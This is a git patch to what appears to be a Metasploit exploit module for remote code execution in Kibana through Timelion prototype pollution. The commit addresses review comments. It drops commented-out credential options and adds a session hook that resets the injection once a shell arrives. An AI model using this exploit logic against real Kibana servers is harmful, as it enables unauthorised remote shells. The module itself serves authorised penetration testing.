From c6a26528611051d3eaa88f6aec13a9b8e4550bfc Mon Sep 17 00:00:00 2001
From: h00die <michaeltcyr@gmail.com>
Date: Fri, 1 Sep 2023 20:34:35 -0400
Subject: [PATCH] review comments

---
 .../kibana_timelion_prototype_pollution_rce.rb   | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb b/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb
index 2c3a4e7f057d..50ce1f9f1852 100644
--- a/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb
+++ b/modules/exploits/linux/http/kibana_timelion_prototype_pollution_rce.rb
@@ -62,8 +62,6 @@ def initialize(info = {})
     register_options(
       [
         Opt::RPORT(5601),
-        # OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
-        # OptString.new('PASSWORD', [ false, 'Password to login with', '123456']),
         OptString.new('TARGETURI', [ true, 'The URI of the Kibana Application', '/'])
       ]
     )
@@ -178,8 +176,22 @@ def exploit
     trigger_socket
     print_status('Waiting for shells')
     Rex.sleep(datastore['WFSDELAY'] / 10)
+    unless @reset_done
+      print_status('Unsetting to stop raining shells from a lacerated kibana')
+      send_injection(reset: true)
+      trigger_socket
+    end
+  end
+
+  def on_new_session(_client)
+    return if @reset_done
+
     print_status('Unsetting to stop raining shells from a lacerated kibana')
     send_injection(reset: true)
     trigger_socket
+    @reset_done = true
+  ensure
+    super
   end
+
 end